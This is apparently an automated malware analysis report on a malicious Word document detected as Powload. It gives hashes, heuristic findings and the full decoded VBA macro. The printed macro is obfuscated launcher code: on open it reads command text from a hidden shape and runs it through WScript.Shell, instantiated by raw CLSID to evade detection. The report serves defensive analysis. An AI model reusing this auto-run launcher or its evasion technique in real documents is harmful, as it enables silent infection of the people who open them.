Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 aac219dff293ccaf…

MALICIOUS

Office (OLE)

77.8 KB Created: 2018-11-26 16:13:00 Authoring application: Microsoft Office Word First seen: 2019-05-16
MD5: d3fcf9f5868afb025192037cf3164a5c SHA-1: 13c70ca5429793393a50ce27517741eb613f7837 SHA-256: aac219dff293ccaf9f8ec70575185c6579f723691cfc901c17f5095af439483f
252 Risk Score

Malware Insights

MITRE ATT&CK
T1059.003 Windows Command Shell T1203 Exploitation for Client Execution

The sample contains VBA macros that are designed to execute obfuscated commands via cmd.exe. Specifically, the AutoOpen macro attempts to construct and run a complex command string that appears to download and execute a second-stage payload. The use of WScript.Shell CLSID further indicates malicious intent to interact with the system.

Heuristics 9

  • ClamAV: Doc.Malware.Powload-6775323-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Powload-6775323-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA instantiates a dangerous COM class by CLSID critical OLE_VBA_GETOBJECT_CLSID_DANGEROUS
    VBA uses GetObject("new:{CLSID}") to instantiate an execution/scripting-capable COM class by its raw CLSID, avoiding the CreateObject ProgID that name-based detection keys on.
    Matched line in script
          End Select
    Set SKNLli = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + bcOhIKt)
       On Error Resume Next
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
          End Select
    Set SKNLli = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + bcOhIKt)
       On Error Resume Next
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Customizable = True
    Sub AutoOpen()
       On Error Resume Next
  • Suspicious cmd.exe invocation with execution flag high SC_STR_CMD
    Suspicious cmd.exe invocation with execution flag
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6806 bytes
SHA-256: 59096927f01063a6d531abc24a0efba110199dbba5e8d713edde060972cd362e
Detection
ClamAV: No threats found
Obfuscation or payload: likely
109 of 163 identifiers look randomly generated (e.g. 'NarmvINMqnkL') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "qLWJVzw"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   On Error Resume Next
      Select Case EdnbV
         Case 171915710
            Hmozd = 252445714
            vKITZfT = CLng(53884184)
         Case 32346758
            zsUGkILW = Oct(PQKIKvSBC)
            QqKmAppSm = diwYDbcG
         Case 320116756
            idbkWKk = CDate(zYGiR)
            otpFTQ = Int(307001358 * ZjPjUlEiS)
      End Select
   On Error Resume Next
      Select Case pwQwHwzdR
         Case 147208844
            mQMuHBZw = 276619519
            RjWXGq = CLng(249665415)
         Case 90566389
            jBDlYYO = Oct(iifWOcKcJ)
            JFWhnFj = NtaBHLP
         Case 304863865
            jiinVtHu = CDate(KrCHMv)
            MbIACOwBA = Int(75997176 * TdWTHUp)
      End Select
Set iNnPa = Shapes("NarmvINMqnkL")
   On Error Resume Next
      Select Case uaZBYjXFa
         Case 2309754
            pFHla = 205503100
            kfYiITV = CLng(129520066)
         Case 291203322
            FaAwDSLU = Oct(lfQGI)
            dHRPES = jMQOYMRF
         Case 207604940
            rkAzz = CDate(mnvRZ)
            zUYPTfMDE = Int(263971796 * Pqoiouw)
      End Select
cYarBTAmPGi = "" + fcIAP + wpJtlt + aYWIO + DPkJK + iNnPa.TextFrame.TextRange.Text + szOfnWvB + BLYbf
   On Error Resume Next
      Select Case bwCDpzB
         Case 46729088
            iOYKDUS = 154742898
            BVcLLdXR = CLng(210548936)
         Case 12300487
            OzboO = Oct(WAAEh)
            ihROR = lpWAZccz
         Case 105486520
            ZfYTzzPi = CDate(kwzwRWkU)
            witOGj = Int(305416970 * lNawMR)
      End Select
   On Error Resume Next
      Select Case Whjlq
         Case 342307649
            DsQwrp = 129312861
            PimJGi = CLng(193695721)
         Case 94406064
            kCBfZlX = Oct(qRQjSTwXN)
            UaFMQ = CwXBPrbsS
         Case 49718789
            nwldG = CDate(wBXDkzPnl)
            ZIoXXlKdd = Int(92171677 * kzqXNKS)
      End Select
   On Error Resume Next
      Select Case hPwhkLi
         Case 111619465
            TaBzMnzh = 272522927
            bSoGsvat = CLng(136070643)
         Case 270553890
            zNjCM = Oct(JDBmZbQ)
            ivdhu = BuEQC
         Case 297611781
            GmKRN = CDate(jWMUuzS)
            dnwCrYzK = Int(338806946 * LanzDJQAT)
      End Select
Set SKNLli = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + bcOhIKt)
   On Error Resume Next
      Select Case hNILcORwj
         Case 272614853
            iPEBQiVV = 110422557
            IXJpcq = CLng(192569596)
         Case 45411639
            fKhua = Oct(WpShWM)
            JMJLuG = VjnufZq
         Case 338584135
            AYnpiKZ = CDate(Udjtp)
            otCuN = Int(321273322 * RvWkfvXn)
      End Select
   On Error Resume Next
      Select Case niKHWz
         Case 62712291
            TQjUBr = 299574856
            mjzzwP = CLng(28373123)
         Case 133794171
            ZzFZrHkb = Oct(ziAlnX)
            WTwUaBaO = szUJMY
         Case 175096216
            awAEqbJws = CDate(sLKBsbMbw)
            zGYXq = Int(54366830 * JPSzbHKKq)
      End Select
   On Error Resume Next
      Select Case TqSuVzPp
         Case 254953312
            SRzFA = 18554173
            ToXFNuKo = CLng(174765228)
         Case 214726531
            vMFcRRj = Oct(jJHwp)
            qSuXnvG = hBabj
         Case 44710062
            IFvQtuZAq = CDate(iZATiMpif)
            bPRmkOt = Int(204209981 * CqkZE)
      End Select
   On Error Resume Next
      Select Case ILHuLLkSf
         Case 35205140
            XWQJQwWn = 95169026
            AtrnN = CLng(51610355)
         Case 130353324
            zVZwREj = Oct(QStXnW)
            wLDYzUWF = wqISPHwD
         Case 112630638
            fjPbELcBj = CDate(urSdL)
            cJiUFdQrz = Int(179830947 * OzJTpGwqw)
      End Select
Const wMizh = 0
   On Error Resume Next
      Select Case rFitF
         Case 69091941
            CImbX = 64553337
            UEOAaa = CLng(117841373)
         Case 256185431
            OkQhQWAo = Oct(ThKAoRPHS)
            wzQQiZKpJ = iLlEaUIoc
         Case 254955387
            IzjEcGUP = CDate(lTIRqhwUm)
            FhrrR = Int(47664962 * FZUIaifTn)
      End Select
   On Error Resume Next
      Select Case wPYnm
         Case 153911123
            UfjfS = 111806296
            klvkoQG = CLng(78309060)
         Case 316795503
            pzNNtR = Oct(zRwFz)
            aSEGBpA = sOpdX
         Case 184530810
            piAmTEzpJ = CDate(bNbfASVl)
            VRjKF = Int(146015791 * SwiYjVpRK)
      End Select
SKNLli.Run! cYarBTAmPGi, wMizh
   On Error Resume Next
      Select Case PuhqtZM
         Case 99214300
            wvzkicV = 303259403
            CjINH = CLng(288308409)
         Case 118798962
            wYYaIh = Oct(NLBSQ)
            bGQfpzpUm = msKuS
         Case 100331047
            mqYhb = CDate(qDpOzWTa)
            dNaZs = Int(226264793 * tcrLRm)
      End Select
   On Error Resume Next
      Select Case FEcrjzVY
         Case 68880352
            VWtVOWSwi = 159733432
            XZVLL = CLng(50446225)
         Case 204684516
            iTqmaJ = Oct(DIOvSmdfc)
            nsuMWRcG = iiGfUrp
         Case 31625011
            iijTMVSJ = CDate(jFOtusfX)
            kGIBNf = Int(314139097 * OzctEch)
      End Select
   On Error Resume Next
      Select Case SGSKm
         Case 298416984
            kESCTnbpu = 207580043
            TjwWHJIYZ = CLng(59435681)
         Case 137644640
            cssnE = Oct(BmJzXl)
            CoHdzUQwr = sKvwJBOU
         Case 232688174
            zqJbAW = CDate(ttlWLKW)
            VBuco = Int(26556528 * lJzcIO)
      End Select
   On Error Resume Next
      Select Case HjwSdjVD
         Case 247477994
            ltJQHiE = 34883385
            fVuOTK = CLng(62508234)
         Case 31716602
            wiCqw = Oct(iYDItirw)
            PHcjElL = LpQLNS
         Case 187534503
            UiUEH = CDate(vviljbv)
            hnWYwL = Int(221072836 * AOnNqAh)
      End Select
   On Error Resume Next
      Select Case XjaYisz
         Case 311681866
            ZfuOYk = 306694237
            TSuutlcKv = CLng(166535911)
         Case 292192121
            clEtD = Oct(wUULp)
            mtnPX = FuqmQ
         Case 62710060
            jizwO = CDate(TEvqnaAK)
            naXIdo = Int(51301277 * wMmqTzJpU)
      End Select
End Sub